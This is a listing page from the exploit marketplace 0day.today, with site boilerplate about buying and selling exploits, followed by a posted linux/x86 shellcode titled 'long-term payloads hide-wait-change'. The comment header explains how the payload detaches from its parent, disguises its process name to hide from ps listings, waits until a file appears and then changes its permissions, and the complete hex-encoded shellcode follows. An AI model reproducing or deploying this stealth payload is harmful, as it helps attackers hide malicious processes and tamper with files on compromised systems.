0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
linux/x86 examples of long-term payloads hide-wait-change 187 bytes+
[==================================================================== linux/x86 examples of long-term payloads hide-wait-change 187 bytes+ ==================================================================== /*----------------------------------------------------------------------------* * [Mystique Project: Examples of long-term payloads] * * hide-wait-change code * * by xort@tty64.org & izik@tty64.org * *----------------------------------------------------------------------------* * This code, upon execution, will perform the following things... * * * * 1) Fork a new process, and kill PPID via _exit() so we get inherrited * * by init and now have a new PID. * * 2) Will obtain the current location of argv[0] by retrieving information * * from /proc/self/stat. * * 3) Copy the name we wish to masquarade as into argv[0] in memory. * * 4) Call setsid() to establish ourselfs as a process leader. * * 5) Will sleep via nanosleep() for a givin interval of time. * * 6) Will check to see if a file exist via access(). * * 7) If it does not Loop back to step 5 * * 8) If it does then we chmod() the file with permissions 0455. * * 9) Calls _exit() * * * * * steps 3-4 effectivly hide us from most ps-listings * * * * size: 187 + strlen(new-proc-name) + strlen(file-to-change) * *----------------------------------------------------------------------------*/ char shellcode[]= "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x79\x31\xc0\x40\xcd\x80\x5b\x8d" "\x73\x10\xfe\x43\x0f\x99\x31\xc9\xb0\x05\xcd\x80\x93\x6a\x03\x58" "\xb2\xfa\x89\xe1\x29\xd1\xcd\x80\x89\xcf\x01\xc7\x93\xfd\x6a\x20" "\x58\x6a\x0e\x59\x87\xcb\xf2\xae\x87\xcb\xe2\xf8\x47\x47\x31\xc0" "\x6a\x0a\x5b\xfc\x31\xd2\x8a\x0f\x83\xe9\x30\x01\xc8\x47\x80\x3f" "\x20\x74\x04\xf7\xe3\xeb\xed\x94\x5f\x5f\x94\x57\xb1\xff\x31\xc0" "\xf3\xaa\x5f\x56\x4e\x46\x41\x80\x3e\xff\x75\xf9\xfe\x06\x5e\xf3" "\xa4\xb0\x42\xcd\x80\x89\xf7\x92\x48\x89\xc1\xf2\xae\xfe\x47\xff" "\xff\xe7\xe8\x87\xff\xff\xff" "/proc/self/stat\xff" // "xort and izik rocks the linux box\xff" // new proc name "/tmp/foo\xff" // file to chmod "\x6a" // "\x03" // sleep-time "\x40\x89\xe1\x89\xe3\x34\xa2\xcd\x80\x31\xc9\x89\xf3\x34\x21\xcd" "\x80\x85\xc0\x75\xeb\xb0\x0f\x66\xb9\x6d\x09\xcd\x80\x40\xcd\x80"; # 0day.today [2024-11-16] #